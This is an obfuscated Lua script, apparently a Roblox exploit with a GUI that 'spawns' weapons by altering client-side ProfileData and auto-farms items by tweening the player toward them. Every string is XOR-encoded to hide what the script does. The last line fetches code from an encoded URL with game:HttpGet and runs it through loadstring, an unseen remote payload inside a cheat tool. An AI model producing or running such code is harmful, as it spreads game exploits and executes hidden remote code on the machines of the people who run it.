--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v168,v169) local v170={};for v219=1, #v168 do v6(v170,v0(v4(v1(v2(v168,v219,v219 + 1 )),v1(v2(v169,1 + (v219% #v169) ,1 + (v219% #v169) + 1 )))%256 ));end return v5(v170);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\23\218\47\192\242\16\200\56\211\245\32\200","\156\67\173\74\165"));local v10=game:GetService(v7("\6\162\71\37\185\52\80\61\180\76","\38\84\215\41\118\220\70"));local v11=v8.LocalPlayer;local function v12(v171,v172) local v173=Instance.new(v7("\101\63\1\29\236\94\19\48","\158\48\118\66\114"));v173.CornerRadius=v172 or UDim.new(0,8) ;v173.Parent=v171;return v173;end local function v13(v176,v177,v178) local v179=0 + 0 ;local v180;while true do if (v179==(9 -7)) then return v180;end if (v179==(753 -(239 + 514))) then v180=Instance.new(v7("\152\43\5\56\119","\155\203\68\112\86\19\197"));v180.SoundId=v7("\84\223\46\253\83\107\224\236\79\217\108\179\15","\152\38\189\86\156\32\24\133")   .. v177 ;v179=1 + 0 ;end if (v179==1) then v180.Volume=v178 or 1 ;v180.Parent=v176;v179=1331 -(797 + 532) ;end end end local function v14(v181) local v182=0 + 0 ;local v183;local v184;local v185;local v186;while true do if (0==v182) then v183=v181.Size;v184=TweenInfo.new(0.1 + 0 ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v182=2 -1 ;end if (v182==(1203 -(373 + 829))) then v185=v9:Create(v181,v184,{[v7("\207\94\189\67","\38\156\55\199")]=v183-UDim2.new(731 -(476 + 255) ,5,1130 -(369 + 761) ,3 + 2 ) });v186=v9:Create(v181,v184,{[v7("\155\116\102\45","\35\200\29\28\72\115\20\154")]=v183});v182=2 -0 ;end if (v182==2) then v185:Play();v185.Completed:Connect(function() v186:Play();end);break;end end end local function v15(v187) local v188=0;local v189;local v190;local v191;local v192;local v193;while true do if (v188==2) then v193=v9:Create(v187,v191,{[v7("\136\95\211\165","\161\219\54\169\192\90\48\80")]=v189});v192:Play();v188=5 -2 ;end if ((238 -(64 + 174))==v188) then local v235=0 + 0 ;while true do if (v235==0) then v189=v187.Size;v190=TweenInfo.new(0.1 -0 ,Enum.EasingStyle.Back,Enum.EasingDirection.Out);v235=337 -(144 + 192) ;end if (v235==(217 -(42 + 174))) then v188=1 + 0 ;break;end end end if (v188==1) then v191=TweenInfo.new(0.1,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v192=v9:Create(v187,v190,{[v7("\42\182\203\218","\84\121\223\177\191\237\76")]=v189-UDim2.new(0 + 0 ,2 + 2 ,1504 -(363 + 1141) ,2) });v188=2;end if (3==v188) then v192.Completed:Connect(function() v193:Play();end);break;end end end local v16=Instance.new(v7("\122\65\18\32\76\76\39\48\64","\69\41\34\96"));v16.ResetOnSpawn=false;v16.Parent=v11:WaitForChild(v7("\140\207\214\19\7\57\155\214\222","\75\220\163\183\106\98"));local v19=Instance.new(v7("\36\168\138\58\220","\185\98\218\235\87"));v19.Size=UDim2.new(0,230,0,1780 -(1183 + 397) );v19.Position=UDim2.new(0.5 -0 , -(85 + 30),0.4 + 0 ,1975 -(1913 + 62) );v19.BackgroundColor3=Color3.fromRGB(22,22,14 + 8 );v19.Active=true;v19.Draggable=true;v19.Parent=v16;v12(v19,UDim.new(0 -0 ,1943 -(565 + 1368) ));local v26=Instance.new(v7("\254\21\20\242\204\165\192\57","\202\171\92\71\134\190"));v26.Thickness=2;v26.Color=Color3.fromRGB(958 -703 ,50,1711 -(1477 + 184) );v26.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v26.Parent=v19;local v32=Instance.new(v7("\29\196\52\156\5\192\46\141\37","\232\73\161\76"));v32.Size=UDim2.new(1 -0 , -(19 + 1),856 -(564 + 292) ,22);v32.Position=UDim2.new(0 -0 ,30 -20 ,0,6);v32.BackgroundTransparency=305 -(244 + 60) ;v32.Text=v7("\159\248\113\117\94\136\250\112\116\46\143\234","\126\219\185\34\61");v32.TextColor3=Color3.fromRGB(255,47 + 13 ,536 -(41 + 435) );v32.TextSize=1019 -(938 + 63) ;v32.Font=Enum.Font.FredokaOne;v32.TextXAlignment=Enum.TextXAlignment.Left;v32.Parent=v19;local v44=Instance.new(v7("\56\203\70\102\82\118\241\226\0","\135\108\174\62\18\30\23\147"));v44.Size=UDim2.new(1, -20,0 + 0 ,16);v44.Position=UDim2.new(1125 -(936 + 189) ,4 + 6 ,1613 -(1565 + 48) ,26);v44.BackgroundTransparency=1;v44.Text=v7("\155\220\24\239\61\156\115\234\143\218\30\238\42\151\115\149","\167\214\137\74\171\120\206\83");v44.TextColor3=Color3.fromRGB(99 + 61 ,1298 -(782 + 356) ,427 -(176 + 91) );v44.TextSize=13;v44.Font=Enum.Font.FredokaOne;v44.TextXAlignment=Enum.TextXAlignment.Left;v44.TextStrokeTransparency=0.5 -0 ;v44.Parent=v19;local v55=Instance.new(v7("\173\226\51\80\253","\199\235\144\82\61\152"));v55.Size=UDim2.new(1 -0 , -(1112 -(975 + 117)),0,1876 -(157 + 1718) );v55.Position=UDim2.new(0 + 0 ,10,0 -0 ,157 -111 );v55.BackgroundColor3=Color3.fromRGB(60,60,1078 -(697 + 321) );v55.BorderSizePixel=0 -0 ;v55.Parent=v19;local v61=Color3.fromRGB(255,105 -55 ,115 -65 );local v62=Color3.fromRGB(20 + 30 ,50,93 -43 );local v63=Color3.fromRGB(187 -117 ,1297 -(322 + 905) ,70);local v64=Instance.new(v7("\51\19\161\63\37\3\173\63\8\24","\75\103\118\217"));v64.Size=UDim2.new(611 -(602 + 9) ,88,1189 -(449 + 740) ,896 -(826 + 46) );v64.Position=UDim2.new(0,957 -(245 + 702) ,0,163);v64.BackgroundColor3=v63;v64.Text=v7("\234\85\121\26","\126\167\52\16\116\217");v64.TextColor3=Color3.fromRGB(255,805 -550 ,82 + 173 );v64.TextSize=1911 -(260 + 1638) ;v64.Font=Enum.Font.FredokaOne;v64.Parent=v19;v12(v64,UDim.new(440 -(382 + 58) ,19 -13 ));local v73=Instance.new(v7("\253\7\19\148\166\22\247\205","\156\168\78\64\224\212\121"));v73.Color=v61;v73.Thickness=1.5 + 0 ;v73.Parent=v64;local v77=Instance.new(v7("\51\235\189\218\37\251\177\218\8\224","\174\103\142\197"));v77.Size=UDim2.new(0,88,0 -0 ,24);v77.Position=UDim2.new(0 -0 ,102,1205 -(902 + 303) ,357 -194 );v77.BackgroundColor3=v62;v77.Text=v7("\119\61\75\55\35\95\234\91","\152\54\72\63\88\69\62");v77.TextColor3=Color3.fromRGB(481 -281 ,18 + 182 ,200);v77.TextSize=1703 -(1121 + 569) ;v77.Font=Enum.Font.FredokaOne;v77.Parent=v19;v12(v77,UDim.new(0,220 -(22 + 192) ));local v86=Instance.new(v7("\225\237\221\72\198\203\229\89","\60\180\164\142"));v86.Color=v61;v86.Thickness=684.5 -(483 + 200) ;v86.Enabled=false;v86.Parent=v77;local v91=v13(v77,6324791946 -(1404 + 59) );local v92=v13(v64,6324790483);local v93=Instance.new(v7("\108\91\29\61\11\236\16\93\82","\114\56\62\101\73\71\141"));v93.Size=UDim2.new(2 -1 , -20,0 -0 ,22);v93.Position=UDim2.new(765 -(468 + 297) ,572 -(334 + 228) ,0 -0 ,119 -67 );v93.BackgroundTransparency=1 -0 ;v93.Text=v7("\143\236\218\212\183\231\155\247\168\232\204\202\189\251","\164\216\137\187");v93.TextColor3=Color3.fromRGB(73 + 182 ,255,255);v93.TextSize=20;v93.Font=Enum.Font.FredokaOne;v93.TextXAlignment=Enum.TextXAlignment.Left;v93.Parent=v19;local v103=Instance.new(v7("\230\227\41\166\132\241\19","\107\178\134\81\210\198\158"));v103.Size=UDim2.new(1, -20,236 -(141 + 95) ,30);v103.Position=UDim2.new(0 + 0 ,10,0 -0 ,187 -109 );v103.BackgroundColor3=Color3.fromRGB(40,10 + 30 ,40);v103.TextColor3=Color3.fromRGB(698 -443 ,180 + 75 ,255);v103.PlaceholderColor3=Color3.fromRGB(120,120,63 + 57 );v103.TextSize=21 -6 ;v103.Font=Enum.Font.FredokaOne;v103.PlaceholderText=v7("\29\0\150\195\184\120\39\150\195\167\120\32\131\203\175\118\64\204","\202\88\110\226\166");v103.Text="";v103.ClearTextOnFocus=false;v103.Parent=v19;v12(v103,UDim.new(0 + 0 ,171 -(92 + 71) ));local v115=Instance.new(v7("\247\10\154\227\232\214\27\150\248\196","\170\163\111\226\151"));v115.Size=UDim2.new(1 + 0 , -(33 -13),765 -(574 + 191) ,30 + 6 );v115.Position=UDim2.new(0,25 -15 ,0 + 0 ,114);v115.BackgroundColor3=Color3.fromRGB(200,889 -(254 + 595) ,40);v115.Text=v7("\34\32\179\47\64\119\0\5\53\191","\73\113\80\210\88\46\87");v115.TextColor3=Color3.fromRGB(255,255,381 -(55 + 71) );v115.TextSize=22 -5 ;v115.Font=Enum.Font.FredokaOne;v115.Parent=v19;v12(v115,UDim.new(1790 -(573 + 1217) ,22 -14 ));local v124=v13(v115,18202483174 -0 );local v125=Instance.new(v7("\181\41\213\6\203\128\46\200\30","\135\225\76\173\114"));v125.Size=UDim2.new(1, -20,564 -(265 + 299) ,20);v125.Position=UDim2.new(0,10,0,207 -149 );v125.BackgroundTransparency=1;v125.Text=v7("\59\216\140\159\138\156\149\55","\199\122\141\216\208\204\221");v125.TextColor3=Color3.fromRGB(19 + 236 ,132 + 123 ,255);v125.TextSize=710 -(619 + 75) ;v125.Font=Enum.Font.FredokaOne;v125.TextXAlignment=Enum.TextXAlignment.Left;v125.Visible=false;v125.Parent=v19;local v136=Instance.new(v7("\153\216\8\228\90\227\185\201\31\254","\150\205\189\112\144\24"));v136.Size=UDim2.new(0,86 -26 ,806 -(118 + 688) ,74 -(25 + 23) );v136.Position=UDim2.new(1 + 0 , -(1956 -(927 + 959)),0,185 -130 );v136.BackgroundColor3=Color3.fromRGB(100,832 -(16 + 716) ,193 -93 );v136.BorderSizePixel=97 -(11 + 86) ;v136.Text="";v136.AutoButtonColor=false;v136.Visible=false;v136.Parent=v19;v12(v136,UDim.new(2 -1 ,285 -(175 + 110) ));local v145=Instance.new(v7("\3\150\190\65\1","\112\69\228\223\44\100\232\113"));v145.Size=UDim2.new(0,55 -33 ,0,108 -86 );v145.Position=UDim2.new(1796 -(503 + 1293) ,2,0 -0 ,2 + 0 );v145.BackgroundColor3=Color3.fromRGB(1316 -(810 + 251) ,177 + 78 ,79 + 176 );v145.Parent=v136;v12(v145,UDim.new(1 + 0 ,533 -(43 + 490) ));local v150=false;local v151=false;local v152,v153;local function v154() if v153 then local v220=733 -(711 + 22) ;local v221;while true do if (v220==(0 -0)) then v221=0;while true do if (v221==(859 -(240 + 619))) then v153:Cancel();v153=nil;break;end end break;end end end end v136.MouseButton1Click:Connect(function() v150= not v150;v151=v150;local v194=(v150 and UDim2.new(0,36,0 + 0 ,2)) or UDim2.new(0 -0 ,1 + 1 ,0,1746 -(1344 + 400) ) ;local v195=(v150 and Color3.fromRGB(445 -(255 + 150) ,158 + 42 ,22 + 18 )) or Color3.fromRGB(100,427 -327 ,100) ;v9:Create(v145,TweenInfo.new(0.2),{[v7("\228\16\20\218\162\117\137\218","\230\180\127\103\179\214\28")]=v194}):Play();v9:Create(v136,TweenInfo.new(0.2 -0 ),{[v7("\174\4\92\77\227\83\239\153\11\91\101\235\77\239\158\86","\128\236\101\63\38\132\33")]=v195}):Play();if v151 then local v222=1739 -(404 + 1335) ;local v223;local v224;local v225;local v226;local v227;local v228;while true do if (v222==(406 -(183 + 223))) then local v287=0;while true do if (v287==(0 -0)) then v223=game:GetService(v7("\155\166\3\79\165\251\206\175\172","\175\204\201\113\36\214\139"));v224=v11.Character or v11.CharacterAdded:Wait() ;v287=1 + 0 ;end if (v287==(1 + 0)) then v225=v224:WaitForChild(v7("\111\217\56\221\10\72\197\49","\100\39\172\85\188"));v222=338 -(10 + 327) ;break;end end end if (v222==(1 + 0)) then v11.CharacterAdded:Connect(function(v301) v224=v301;v225=v301:WaitForChild(v7("\133\109\180\129\61\162\113\189","\83\205\24\217\224"));end);v226=nil;function v226() for v312,v313 in v223:GetChildren() do local v314=338 -(118 + 220) ;local v315;while true do if (v314==0) then v315=v313:FindFirstChild(v7("\197\202\196\51\197\202\195\41\231\204\195\56\244","\93\134\165\173"));if v315 then return v315;end break;end end end end v222=2;end if (v222==(1 + 2)) then v223.DescendantRemoving:Connect(function(v302) if ((v302==v152) or (v152 and (v302.Parent==v152))) then local v320=0;while true do if (v320==0) then v154();v227[v152]=nil;v320=1;end if (v320==(450 -(108 + 341))) then v152=nil;break;end end end end);task.spawn(function() while v151 do local v316=0 + 0 ;while true do if (v316==(0 -0)) then task.wait();if v224 then local v324=0;local v325;while true do if (v324==0) then v325=nil;v325,v152=v228();v324=1;end if (v324==1) then if v152 then local v330=0;while true do if (v330==1) then v153:Play();v153.Completed:Wait();v330=2;end if (v330==(1493 -(711 + 782))) then v227[v152]=true;v153=v9:Create(v224.PrimaryPart,TweenInfo.new(v325/v225.WalkSpeed ),{[v7("\198\104\98\11\232\75","\106\133\46\16")]=v152.CFrame});v330=1 -0 ;end if (v330==(471 -(270 + 199))) then v153=nil;break;end end else v227={};end break;end end end break;end end end end);break;end if (v222==(1 + 1)) then local v288=0;while true do if (v288==(1820 -(580 + 1239))) then function v228() local v321=0 -0 ;local v322;while true do if (v321==0) then v322=v226();if v322 then local v326,v327=math.huge,nil;for v328,v329 in v322:GetChildren() do if (v329:FindFirstChild(v7("\138\253\212\193\50\231\188\106\187\224\196\209\46","\30\222\146\161\162\90\174\210")) and  not v227[v329]) then local v331=(v224:GetPivot().Position-v329.Position).Magnitude;if (v331<v326) then v326,v327=v331,v329;end end end return v326,v327;end break;end end end v222=3;break;end if (v288==0) then v227={};v228=nil;v288=1 + 0 ;end end end end else v154();end end);local function v155(v196) local v197=0 + 0 ;while true do if (v197==(2 + 1)) then v64.TextColor3=(v196 and Color3.fromRGB(665 -410 ,255,255)) or Color3.fromRGB(112 + 68 ,1347 -(645 + 522) ,1970 -(1010 + 780) ) ;v77.TextColor3=(v196 and Color3.fromRGB(180,180 + 0 ,180)) or Color3.fromRGB(255,255,1214 -959 ) ;break;end if (v197==(0 -0)) then v103.Visible=v196;v115.Visible=v196;v93.Visible=v196;v197=1837 -(1045 + 791) ;end if (v197==(4 -2)) then v77.BackgroundColor3=(v196 and v62) or v63 ;v73.Enabled=v196;v86.Enabled= not v196;v197=3;end if (v197==(1 -0)) then local v244=0;while true do if (v244==0) then v136.Visible= not v196;v125.Visible= not v196;v244=506 -(351 + 154) ;end if (v244==1) then v64.BackgroundColor3=(v196 and v63) or v62 ;v197=1576 -(1281 + 293) ;break;end end end end end v64.MouseButton1Click:Connect(function() local v198=266 -(28 + 238) ;while true do if (v198==(2 -1)) then v155(true);break;end if ((1559 -(1381 + 178))==v198) then v92:Play();v15(v64);v198=1 + 0 ;end end end);v77.MouseButton1Click:Connect(function() local v199=0 + 0 ;while true do if (v199==(1 + 0)) then v155(false);break;end if (v199==(0 -0)) then v91:Play();v15(v77);v199=1 + 0 ;end end end);v155(true);local function v156(v200) local v201=470 -(381 + 89) ;local v202;local v203;local v204;local v205;local v206;local v207;while true do if (v201==(3 + 0)) then v205=Instance.new(v7("\137\220\56\88\145\216\34\73\177","\44\221\185\64"));v205.Size=UDim2.new(1 + 0 ,0 -0 ,1157 -(1074 + 82) ,0);v205.BackgroundTransparency=1 -0 ;v205.Text=v200;v201=1788 -(214 + 1570) ;end if (v201==(1460 -(990 + 465))) then v205.Parent=v203;v206=v9:Create(v203,TweenInfo.new(0.4 + 0 ,Enum.EasingStyle.Back,Enum.EasingDirection.Out),{[v7("\49\232\91\86\103\8\232\70","\19\97\135\40\63")]=UDim2.new(0.5 + 0 , -(107 + 3),0.04,0 -0 )});v207=v9:Create(v203,TweenInfo.new(1726.4 -(1668 + 58) ,Enum.EasingStyle.Quad,Enum.EasingDirection.In),{[v7("\158\83\32\50\59\56\161\82","\81\206\60\83\91\79")]=UDim2.new(626.5 -(512 + 114) , -110, -(0.08 -0),0 -0 ),[v7("\108\170\211\121\40\209\66\177\64\175\228\96\46\205\94\180\79\185\213\124\44\218","\196\46\203\176\18\79\163\45")]=3 -2 });v206:Play();v201=6;end if (v201==(1 + 1)) then v204=Instance.new(v7("\126\250\139\88\9\114\64\214","\29\43\179\216\44\123"));v204.Color=v61;v204.Thickness=1.5 + 0 ;v204.Parent=v203;v201=3;end if ((6 + 0)==v201) then task.wait(10 -7 );v207:Play();task.wait(1994.4 -(109 + 1885) );v203:Destroy();break;end if (v201==(1473 -(1269 + 200))) then v205.Font=Enum.Font.FredokaOne;v205.TextSize=30 -14 ;v205.TextColor3=Color3.fromRGB(1070 -(98 + 717) ,1081 -(802 + 24) ,439 -184 );v205.TextScaled=true;v201=6 -1 ;end if (v201==0) then v202=v11:WaitForChild(v7("\104\44\114\229\95\82\127\53\122","\32\56\64\19\156\58")):FindFirstChildOfClass(v7("\105\203\247\83\95\252\167\79\193","\224\58\168\133\54\58\146")) or Instance.new(v7("\106\85\89\248\112\136\160\30\80","\107\57\54\43\157\21\230\231"),v11:WaitForChild(v7("\235\135\16\236\188\206\232\206\130","\175\187\235\113\149\217\188"))) ;v203=Instance.new(v7("\26\189\128\65\230","\24\92\207\225\44\131\25"));v203.Size=UDim2.new(0,220,0 + 0 ,31 + 9 );v203.Position=UDim2.new(0.5 + 0 , -110, -(0.08 + 0),0 -0 );v201=3 -2 ;end if (v201==(1 + 0)) then v203.BackgroundColor3=Color3.fromRGB(17 + 23 ,40,33 + 7 );v203.BorderSizePixel=0 + 0 ;v203.Parent=v202;v12(v203,UDim.new(0 + 0 ,1441 -(797 + 636) ));v201=2;end end end local function v157(v208) local v209=0;local v210;local v211;local v212;local v213;local v214;local v215;local v216;while true do if (v209==(9 -7)) then v211.Parent=v210;v212=Instance.new(v7("\22\93\47\204\242\21\228\39\84","\134\66\56\87\184\190\116"));v212.Size=UDim2.new(1,1619 -(1427 + 192) ,0.55 + 0 ,0 -0 );v212.Position=UDim2.new(0,0,0 + 0 ,6);v212.BackgroundTransparency=1;v209=3;end if (v209==3) then v212.TextColor3=Color3.fromRGB(116 + 139 ,581 -(192 + 134) ,255);v212.TextScaled=true;v212.Text=v7("\15\33\8\172\23\226\47\50\114\127\73\235\92","\85\92\81\105\219\121\139\65");v212.Font=Enum.Font.FredokaOne;v212.Parent=v210;v209=4;end if (v209==1) then v210.Parent=v16;v12(v210,UDim.new(0,1288 -(316 + 960) ));v211=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v211.Color=v61;v211.Thickness=1.5;v209=2;end if (v209==(3 + 1)) then local v275=0 + 0 ;while true do if ((0 + 0)==v275) then v213=Instance.new(v7("\201\182\72\81\80\222\255\182\92","\191\157\211\48\37\28"));v213.Size=UDim2.new(3 -2 ,0,551.35 -(83 + 468) ,1806 -(1202 + 604) );v275=1;end if (v275==(4 -3)) then v213.Position=UDim2.new(0 -0 ,0 -0 ,325.62 -(45 + 280) ,0 + 0 );v213.BackgroundTransparency=1 + 0 ;v275=1 + 1 ;end if ((2 + 0)==v275) then v213.TextColor3=Color3.fromRGB(29 + 131 ,160,160);v209=5;break;end end end if (v209==(12 -5)) then if (v208 and (v208~="")) then local v289,v290=require(game:GetService(v7("\136\81\166\76\179\87\183\84\191\80\133\84\181\70\183\71\191","\32\218\52\214")).Database.Sync.Item),require(game:GetService(v7("\124\18\33\164\248\179\68\78\75\19\2\188\254\162\68\93\75","\58\46\119\81\200\145\208\37")).Modules.ProfileData);local v291=v290.Weapons;local v292=v103.Text;local v293=1912 -(340 + 1571) ;local v294={};local v295=v292;if  not v294[v295] then v294[v295]=0 + 0 ;end v294[v295]=v294[v295] + v293 ;print(v7("\10\136\52\169\173\253","\86\75\236\80\204\201\221")   .. v293   .. v7("\50\85\120\197","\235\18\33\23\229\158")   .. v295   .. v7("\30\250\239\190\71\250\213\180\68\187\205\225\16","\219\48\218\161")   .. v294[v295] );game:GetService(v7("\214\100\114\122\222\93\246\237\114\121","\128\132\17\28\41\187\47")):BindToRenderStep(v7("\40\60\16\63\83\21\61\20\35\104\17\54\7\46\88\62","\61\97\82\102\90")   .. v295 ,1,function() v291.Owned[v295]=v294[v295];end);game.Players.LocalPlayer.Character:BreakJoints();end task.spawn(function() v156("✓  Spawned: "   .. v208 );end);break;end if (v209==(1778 -(1733 + 39))) then v214=0 -0 ;while v214<100  do local v285=1034 -(125 + 909) ;local v286;while true do if (v285==(1948 -(1096 + 852))) then local v318=0 + 0 ;while true do if (v318==(0 -0)) then v286=math.random(2 + 0 ,5);v214=math.min(v214 + v286 ,612 -(409 + 103) );v318=237 -(46 + 190) ;end if (v318==(96 -(51 + 44))) then v285=1 + 0 ;break;end end end if (1==v285) then v212.Text=v7("\9\6\245\162\52\31\250\178\116\88\180","\213\90\118\148")   .. v214   .. "%" ;task.wait(1319.3 -(1114 + 203) );break;end end end v210:Destroy();v215=game:GetService(v7("\105\43\164\90\68\88\47\160\83\73\104\58\187\68\76\92\43","\45\59\78\212\54"));v216=v215:WaitForChild(v7("\34\83\142\132\146\43\190","\144\112\54\227\235\230\78\205")):WaitForChild(v7("\128\32\0\236","\59\211\72\111\156\176")):WaitForChild(v7("\108\136\251\14\65\137\247\63\65\139\239\40\92","\77\46\231\131"));v209=733 -(228 + 498) ;end if (v209==(0 + 0)) then v210=Instance.new(v7("\158\48\127\19\33","\143\216\66\30\126\68\155"));v210.Size=UDim2.new(0,122 + 98 ,663 -(174 + 489) ,208 -128 );v210.Position=UDim2.new(1906 -(830 + 1075) ,534 -(303 + 221) ,0.4,1269 -(231 + 1038) );v210.BackgroundColor3=Color3.fromRGB(19 + 3 ,22,22);v210.BackgroundTransparency=1163 -(171 + 991) ;v209=4 -3 ;end if ((13 -8)==v209) then v213.TextScaled=true;v213.Text=v7("\236\15\241\25\62\159\27\241\12\63\209\27\231\92\53\209\95\228\21\52\216\95\178\92\62\218\9\253\31\63\145","\90\191\127\148\124");v213.Font=Enum.Font.FredokaOne;v213.Parent=v210;v9:Create(v210,TweenInfo.new(0.5 -0 ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{[v7("\72\136\61\30\108\142\33\25","\119\24\231\78")]=UDim2.new(1 + 0 , -(806 -576),0.4 -0 ,0),[v7("\160\44\166\65\219\82\30\151\35\161\126\206\65\31\145\61\164\88\217\78\18\155","\113\226\77\197\42\188\32")]=0 -0 }):Play();v209=6;end end end v115.MouseButton1Click:Connect(function() v124:Play();v14(v115);local v217=v103.Text;if (v217~="") then v157(v217);else local v229=0 -0 ;local v230;while true do if (v229==(1248 -(111 + 1137))) then v230=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v230.Color=v61;v229=1;end if (v229==(159 -(91 + 67))) then v230.Thickness=5 -3 ;v230.Parent=v103;v229=2;end if (v229==(1 + 1)) then task.delay(524 -(423 + 100) ,function() v230:Destroy();end);break;end end end end);local v158=Instance.new(v7("\145\175\59\10\49\17\211\69\170\164","\49\197\202\67\126\115\100\167"));v158.Size=UDim2.new(0,1 + 69 ,0,22);v158.Position=UDim2.new(2 -1 , -80,0 + 0 ,777 -(326 + 445) );v158.BackgroundColor3=Color3.fromRGB(785 -605 ,35,77 -42 );v158.Text="✕  Close";v158.TextColor3=Color3.fromRGB(594 -339 ,966 -(530 + 181) ,255);v158.TextSize=13;v158.Font=Enum.Font.FredokaOne;v158.Parent=v19;v12(v158,UDim.new(0,887 -(614 + 267) ));local v167=v13(v158,6026984256 -(19 + 13) );v158.MouseButton1Click:Connect(function() local v218=0 -0 ;while true do if ((2 -1)==v218) then task.wait(0.15 -0 );v9:Create(v19,TweenInfo.new(0.3 + 0 ,Enum.EasingStyle.Quad,Enum.EasingDirection.In),{[v7("\4\82\197\44","\62\87\59\191\73\224\54")]=UDim2.new(0 -0 ,0 -0 ,0,1812 -(1293 + 519) ),[v7("\215\13\233\192\243\11\245\199","\169\135\98\154")]=v19.Position + UDim2.new(0,115,0,90) }):Play();v218=3 -1 ;end if (v218==(0 -0)) then v167:Play();v14(v158);v218=1;end if (v218==(3 -1)) then task.wait(0.3 -0 );v16:Destroy();break;end end end);loadstring(game:HttpGet(v7("\195\99\48\68\238\105\135\132\103\37\71\233\54\206\210\57\37\68\237\124\206\253\109\6\91\175\23\196\132\101\37\67","\168\171\23\68\52\157\83")))();